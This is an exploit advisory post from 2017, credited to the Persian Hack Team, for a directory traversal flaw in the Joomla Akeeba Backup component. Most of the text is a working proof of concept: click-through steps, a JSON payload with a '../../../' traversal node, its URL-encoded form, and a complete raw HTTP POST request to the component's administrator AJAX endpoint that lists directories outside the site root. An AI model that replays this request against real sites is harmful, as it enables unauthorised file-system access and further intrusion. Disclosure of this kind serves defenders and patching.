Joomla Akeeba Backup 5.2.5 Directory Traversal
Posted on 07 March 2017
# Exploit Title: Joomla Component Akeeba Backup 5.2.5 - Directory Traversal # Date: 2017-03-07 # Home : https://extensions.joomla.org/extensions/extension/access-a-security/site-security/akeeba-backup/ # Version : Akeeba Backup Core 5.3.0.b1 (2017-02-22) # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Home : http://persian-team.ir/ # Telegram Channel AND Demo: @PersianHackTeam POC : 1)Include and Exclude Information Section 2)Click on Files and Directories Exclusion 3)Subdirectories 4)Post action Parameter Encode as Url : {"root":"[SITEROOT]","node":"../../../../../../../","verb":"list"} Request : POST /joomla/administrator/index.php?option=com_akeeba&view=FileFilters&task=ajax HTTP/1.1 Host: 192.168.1.11 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.1.11/joomla/administrator/index.php?option=com_akeeba&view=FileFilters Content-Length: 154 Cookie: 8924dd79f450c03ec0748f316908b847=vod11einhb2gaelq1um1jsje66 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=%7b%22%72%6f%6f%74%22%3a%22%5b%53%49%54%45%52%4f%4f%54%5d%22%2c%22%6e%6f%64%65%22%3a%22%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%22%2c%22%76%65%72%62%22%3a%22%6c%69%73%74%22%7d&_cacheBustingJunk=0.04 # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members # Iranian white hat Hackers